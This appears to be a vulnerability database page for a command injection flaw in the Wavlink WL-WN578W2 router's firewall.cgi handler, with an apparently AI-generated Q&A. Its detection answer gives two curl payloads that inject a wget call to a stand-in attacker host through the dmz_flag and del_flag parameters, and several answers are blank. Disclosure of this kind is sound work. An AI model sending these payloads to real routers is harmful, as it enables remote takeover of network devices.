CVE-2026-4543
Remote Command Injection in Wavlink WL-WN578W2 POST Handler
Publication date: 2026-03-22
Last updated on: 2026-04-30
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wavlink | wl-wn578w2_firmware | 221110 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': 'CVE-2026-4543 is a command injection vulnerability found in the WavLink WL-WN578W2 router, version V221110. It exists in the /cgi-bin/firewall.cgi script, specifically in the POST request handler that processes parameters such as dmz_flag and del_flag. When these parameters are manipulated, the router unsafely constructs command strings that are executed by the system, allowing an attacker to run arbitrary operating system commands remotely.'}, {'type': 'paragraph', 'content': 'Two main vulnerable functions are involved: one triggered when the firewall parameter equals "DMZ" (processing dmz_flag), and another when the firewall parameter equals "singlePortForwardDelete" (processing del_flag). Both lead to execution of attacker-controlled commands via the system() call.'}] [1, 2]
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without user interaction. This can lead to unauthorized control over the device, enabling attackers to download malicious files, alter configurations, disrupt network traffic, or use the device as a foothold for further attacks within the network.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by sending crafted POST requests to the /cgi-bin/firewall.cgi endpoint of the WavLink WL-WN578W2 router and observing if arbitrary commands are executed.'}, {'type': 'paragraph', 'content': 'For example, you can test the command injection by sending a POST request with parameters that include command injection payloads in the dmz_flag or del_flag arguments.'}, {'type': 'paragraph', 'content': 'A sample command using curl to test the dmz_flag parameter is:'}, {'type': 'list_item', 'content': 'curl -X POST http://[router_ip]/cgi-bin/firewall.cgi -d "firewall=DMZ&dmz_flag=0;wget http://[attacker_ip]:6666/testpoc"'}, {'type': 'paragraph', 'content': 'Similarly, to test the del_flag parameter, use:'}, {'type': 'list_item', 'content': 'curl -X POST http://[router_ip]/cgi-bin/firewall.cgi -d "firewall=singlePortForwardDelete&del_flag=0;wget http://[attacker_ip]:6666/testpoc"'}, {'type': 'paragraph', 'content': "If the router executes the injected command (e.g., downloads the testpoc file from the attacker's server), it confirms the presence of the vulnerability."}] [1, 2]
What immediate steps should I take to mitigate this vulnerability?
I don't know